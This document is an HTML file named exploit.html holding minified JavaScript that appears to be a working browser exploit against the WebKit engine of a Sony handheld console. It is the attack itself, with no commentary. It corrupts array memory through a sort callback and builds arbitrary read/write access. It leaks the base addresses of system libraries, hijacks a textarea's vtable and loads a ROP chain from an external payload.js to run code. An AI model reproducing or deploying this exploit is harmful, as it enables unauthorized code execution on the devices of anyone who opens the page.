exploit.html

<noscript>Go to browser settings and check "Enable JavaScript", then reload this page.</noscript><script src='payload.js'></script><script>try{var e=null;function a(a,r){if(!e)e=new DataView(new ArrayBuffer(16));e.setUint32(0,r);e.setUint32(4,a);return e.getFloat64(0)}function r(a){if(!e)e=new DataView(new ArrayBuffer(16));e.setFloat64(0,a);return{low:e.getUint32(4),hi:e.getUint32(0)}}function t(e){var a=r(e);hi=a.hi.toString(16);lo=a.low.toString(16);while(lo.length<8)lo="0"+lo;return"0x"+hi+lo}function o(e){while(1)alert(e)}var s=new Uint32Array(1024);var n=new Uint32Array(55);n[0]=74565;n[1]=424080;var i=document.createElement("textarea");i.rows=287454020;var c=a(2147483648,2147483648);var u=40960;var b=65536;var d=10;var f=new Array(b);var l={};l.toString=function(){f.push(12345);buf=new Uint32Array(159744);buf[0]=-1;return""};f[0]=l;f[1]=n;f[2]=i;f.sort();l.toString=function(){return""};var _=buf[8204];var p=buf[8202];var f=new Array(73728);var l={};var v=[];l.toString=function(){f.push(12345);for(var e=0;e<d;++e){var a=new Array(u);a[0]=1234.5;v.push(a)}return""};f[0]=l;for(var S=1;S<49152;++S)f[S]=c;f.sort();l.toString=function(){return""};for(var S=0;S<v.length;++S){if(v[S].length!=u){found=v[S]}}if(!found||found.length!=2147483648){o("failed")}var h=found[536821755];var w=r(h).low;found[536870907]=a(w,0);found[536870908]=0;found[536870909]=0;var h=r(found[536821756]).low;if(h==2203615232){me=2208825344+40}else if(h==2202566656){me=2207776768+40}else{found[268435456]=123}scratch=me+4096;me-=2719744;function g(e){idx=536870912+(e-me)/8;return found[idx]}function y(e,a){idx=536870912+(e-me)/8;found[idx]=a}l=r(g(_+8)).hi;y(l+8,a(0,2147483648));y(l+24,a(0,2147483648));if(n.length!=2147483648)o("failed to corrupt a buffer");u32=n;l=u32[(p+12)/4];textareavptr=u32[l/4];vtidx=l;function m(e){first=u32[e/4];second=u32[e/4+1];return((first&4095|(first&983040)>>4)&65535|((second&4095|(second&983040)>>4)&65535)<<16)>>>0}SceWebKit_base=textareavptr-11253340;SceLibc_base=m(SceWebKit_base+8779012)-64073;SceLibKernel_base=m(SceWebKit_base+8778852)-36913;ScePsp2Compat_base=m(SceWebKit_base+8770276)-142693;SceWebFiltering_base=m(ScePsp2Compat_base+2910348)-2533;SceLibHttp_base=m(SceWebFiltering_base+15300)-56365;SceNet_base=m(SceWebKit_base+8778772)-9197;SceNetCtl_base=m(SceLibHttp_base+101364)-3417;SceAppMgr_base=m(SceNetCtl_base+39608)-18893;some_space=scratch;for(var S=0;S<64;S++)u32[some_space/4+S]=u32[textareavptr/4+S];u32[vtidx/4]=some_space;for(var S=0;S<48;++S)s[S]=u32[vtidx/4+S];u32[some_space/4+78]=SceLibc_base+82032|1;i.scrollLeft=0;sp=(u32[vtidx/4+8]^(u32[vtidx/4+9]^SceWebKit_base+3242281)>>>0)>>>0;sp-=981016;for(var S=0;S<48;++S)u32[vtidx/4+S]=s[S];rop_data_base=sp+64;rop_code_base=sp+65536;addr=rop_code_base/4;for(var S=0;S<payload.length;++S,++addr){switch(relocs[S]){case 0:u32[addr]=payload[S];break;case 1:u32[addr]=payload[S]+rop_data_base;break;case 2:u32[addr]=payload[S]+SceWebKit_base;break;case 3:u32[addr]=payload[S]+SceLibKernel_base;break;case 4:u32[addr]=payload[S]+SceLibc_base;break;case 5:u32[addr]=payload[S]+SceLibHttp_base;break;case 6:u32[addr]=payload[S]+SceNet_base;break;case 7:u32[addr]=payload[S]+SceAppMgr_base;break;default:alert("wtf?");alert(S+" "+relocs[S])}}u32[some_space/4+78]=SceWebKit_base+21704;var x=some_space+256;u32[x/4+5]=rop_code_base;u32[x/4+6]=SceWebKit_base+787594|1;i.scrollLeft=x;alert("that's it")}catch(e){alert("error: "+e.message)}
</script>